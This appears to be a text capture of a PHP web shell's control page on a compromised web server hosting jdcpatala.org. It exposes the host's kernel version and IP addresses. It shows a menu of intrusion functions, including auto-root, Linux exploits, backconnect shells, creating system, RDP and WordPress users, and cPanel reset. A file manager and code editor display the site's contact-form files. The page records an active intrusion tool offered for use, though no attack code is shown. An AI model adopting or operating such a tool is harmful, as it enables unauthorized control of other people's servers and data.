Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.218.61.200
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
contact /
[ HOME SHELL ]
Name
Size
Permission
Action
file
[ DIR ]
drwxr-xr-x
README.doc
28.5
KB
-rw-r--r--
class.phpmailer.php
44.6
KB
-rw-r--r--
class.smtp.php
33.15
KB
-rw-r--r--
contact.html
2.42
KB
-rw-r--r--
contact.php
1.35
KB
-rw-r--r--
error_log
2.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Contact Us</title> <script language="javascript"> function validate() { if(document.getElementById("fullname").value=='') { alert("Please provide your full name"); document.getElementById("fullname").focus(); return false; } if(document.getElementById("email").value=='') { alert("Please provide email address"); document.getElementById("email").focus(); return false; } if(document.getElementById("subject").value=='') { alert("Please provide subject line"); document.getElementById("subject").focus(); return false; } if(document.getElementById("query").value=='') { alert("Please enter your query"); document.getElementById("query").focus(); return false; } } </script> </head> <body> <form name="form" method="post" action="contact.php"> <table width="100%" border="0" align="center" cellpadding="3" cellspacing="1"> <tbody> <tr><td colspan="3" align="center"><h2>Contact Us</h2></td></tr> <tr> <td width="39%" align="right" ><strong>Full Name<font color="#ff0000"> *</font></strong></td> <td width="1%" ><div align="center">:</div></td> <td width="60%" height="25"><input type="text" name="fullname" id="fullname" /></td> </tr> <tr> <td width="39%" align="right" ><strong>Email<font color="#ff0000"> *</font></strong></td> <td width="1%" ><div align="center">:</div></td> <td width="60%" height="25"><input type="text" name="email" id="email" /></td> </tr> <tr> <td align="right"><strong>Subject<font color="#ff0000"> *</font></strong></td> <td ><div align="center">:</div></td> <td height="25"><input type="text" name="subject" id="subject" /></td> </tr> <tr> <td align="right" valign="top"><strong>Please Type Your Query If Any<font color="#ff0000"> *</font> </strong></td> <td ><div align="center">:</div></td> <td height="25"><textarea name="query" id="query" rows="5" cols="30"></textarea></td> </tr> <tr> <td colspan="2" align="right"></td><td><input name="btnSubmit" type="submit" onclick="javascript: return validate();" value="Submit" /></td> </tr> </tbody> </table> </form> </body> </html>
Close